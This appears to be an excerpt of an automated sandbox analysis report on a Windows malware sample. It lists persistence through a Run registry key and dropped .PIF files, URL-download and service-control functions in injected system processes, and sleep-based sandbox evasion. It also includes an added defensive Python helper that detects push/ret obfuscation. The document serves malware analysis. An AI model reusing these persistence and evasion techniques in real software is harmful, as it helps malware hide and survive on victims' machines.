Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_0290790C: push 02907989h; ret (ret at 0_2_02907981)
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function 0_2_02905E7C: push ecx; mov dword ptr [esp], edx (at 0_2_02905E7E)
(A "push <address>; ret" pair is an indirect jump: the CPU pops the pushed value as its return address, so control moves to it without a call or jmp that a disassembler would follow. Compiler-generated code produces the same sequences, for example the try/finally epilogue and the "push ecx; mov [esp], edx" local-variable idiom of Delphi, so treat them as a supporting indicator; the unpacked-PE Yara hits above carry more weight.)
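The two static checks behind the Data Obfuscation findings, written out as an added example for this page (it is not Joe Sandbox code): a byte scanner that reports adjacent "push imm32; ret" pairs as the jumps they really are, and a decoder for the PE TimeDateStamp that flags a link time in the future. The code bytes are constructed to mirror the report's push/ret findings and the load address is an assumption; the timestamp value is the one the report shows for alpha.pif.

```python
r"""Static triage helpers for push/ret obfuscation and PE timestamps.

Added example, not Joe Sandbox code. SAMPLE_CODE and SAMPLE_BASE are
constructed/assumed; ALPHA_PIF_TIMESTAMP is the value in the report.
"""
import datetime as dt
import struct
from typing import List, Optional, Tuple

PUSH_IMM32 = 0x68   # push imm32
RET = 0xC3          # near ret
EPOCH = dt.datetime(1970, 1, 1, tzinfo=dt.timezone.utc)


def find_push_ret(code: bytes, base: int) -> List[Tuple[int, int, int]]:
    """Locate adjacent 'push imm32; ret' pairs (bytes 68 xx xx xx xx C3).

    The CPU treats the pushed immediate as the return address, so the pair
    behaves like 'jmp imm32' while hiding the edge from linear disassembly
    and call-graph builders. Returns (push_addr, ret_addr, target) tuples.
    The report's 'push ecx; ret' / 'push eax; ret' variants jump through a
    register and are deliberately not matched here.
    """
    hits = []
    i = 0
    while i + 6 <= len(code):
        if code[i] == PUSH_IMM32 and code[i + 5] == RET:
            target = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((base + i, base + i + 5, target))
            i += 6
        else:
            i += 1
    return hits


def describe(hits) -> List[str]:
    """Render hits in the report's own style, with the equivalent jmp."""
    return [f"{p:08X} push {t:08X}h; ret {r:08X}  (== jmp {t:08X}h)"
            for p, r, t in hits]


def pe_timestamp(ts: int) -> dt.datetime:
    """Decode IMAGE_FILE_HEADER.TimeDateStamp (seconds since 1970, UTC)."""
    return EPOCH + dt.timedelta(seconds=ts)


def timestamp_is_future(ts: int, now: Optional[dt.datetime] = None) -> bool:
    """True when the link time lies after 'now'.

    A genuine clock value cannot be in the future, so a hit means the field
    was overwritten by a packer or builder, or (as with Microsoft's
    reproducible builds, where the field holds a hash) was never a clock
    value at all. Confirm against the file's origin before acting on it.
    """
    now = now or dt.datetime.now(dt.timezone.utc)
    return pe_timestamp(ts) > now


# Constructed sample: one genuine pair, then a push whose ret is not
# adjacent (a NOP sits between), which must not be reported.
SAMPLE_BASE = 0x028F63FD                    # assumed load address
SAMPLE_CODE = bytes.fromhex("90 68 0B 64 8F 02 C3 68 11 22 33 44 90 C3")
ALPHA_PIF_TIMESTAMP = 0xF8D87E17            # value from the report


if __name__ == "__main__":
    for line in describe(find_push_ret(SAMPLE_CODE, SAMPLE_BASE)):
        print(line)
    stamp = pe_timestamp(ALPHA_PIF_TIMESTAMP)
    print(stamp.isoformat(), "future" if timestamp_is_future(ALPHA_PIF_TIMESTAMP) else "ok")
```

Run against a dumped code section with its real image base, the scanner's output lines up one-to-one with the report's "push ...; ret" entries, and the decoded timestamp reproduces the report's 2102 date for alpha.pif.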

                    Persistence and Installation Behavior

                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\Libraries\Qzzgbhha.PIF
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F96EEB ShellExecuteW,URLDownloadToFileW,7_2_02F96EEB

                    Boot Survival

                    Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FAAADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_02FAAADB
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Qzzgbhha
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_0290AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0290AB1C
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F9F7E2 Sleep,ExitProcess,7_2_02F9F7E2
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0288F7E2 Sleep,ExitProcess,10_2_0288F7E2
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0300F7E2 Sleep,ExitProcess,12_2_0300F7E2
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_02FAA7D9
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_2_0289A7D9
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0301A7D9
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Window / User API: threadDelayed 5102
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Window / User API: threadDelayed 4405
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Window / User API: foregroundWindowGot 1756
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | API coverage: 9.0 %
                    Source: C:\Windows\SysWOW64\SndVol.exe | API coverage: 5.9 %
                    Source: C:\Windows\SysWOW64\SndVol.exe | API coverage: 5.9 %
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3176 | Thread sleep count: 247 > 30
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3176 | Thread sleep time: -123500s >= -30000s
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 432 | Thread sleep count: 5102 > 30
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 432 | Thread sleep time: -15306000s >= -30000s
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 432 | Thread sleep count: 4405 > 30
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 432 | Thread sleep time: -13215000s >= -30000s
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_028F5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028F5908
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F9928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_02F9928E
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F9C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,7_2_02F9C388
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FAC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_02FAC322
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F996A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_02F996A0
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FA9B86 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_02FA9B86
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F9BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_02F9BB6B
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FDE8F9 FindFirstFileExA,7_2_02FDE8F9
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F97877 FindFirstFileW,FindNextFileW,7_2_02F97877
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F98847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,7_2_02F98847
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F9BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_02F9BD72
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0288928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0288928E
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0288C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0288C388
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0289C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_0289C322
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_028896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_028896A0
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_02899B86 FindFirstFileW,FindNextFileW,FindNextFileW,10_2_02899B86
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0288BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0288BB6B
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_028CE8F9 FindFirstFileExA,10_2_028CE8F9
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_02888847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_02888847
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_02887877 FindFirstFileW,FindNextFileW,10_2_02887877
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0288BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0288BD72
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0301C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0301C322
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0300C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0300C388
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0300928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0300928E
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_030096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_030096A0
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0300BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0300BB6B
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_03019B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_03019B86
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_03008847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_03008847
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_03007877 FindFirstFileW,FindNextFileW,12_2_03007877
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0304E8F9 FindFirstFileExA,12_2_0304E8F9
                    Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0300BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0300BD72
                    Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F97CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_02F97CD2
                    Source: colorcpl.exe, 00000007.00000002.4510209869.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2139804062.00000000007AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW6
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
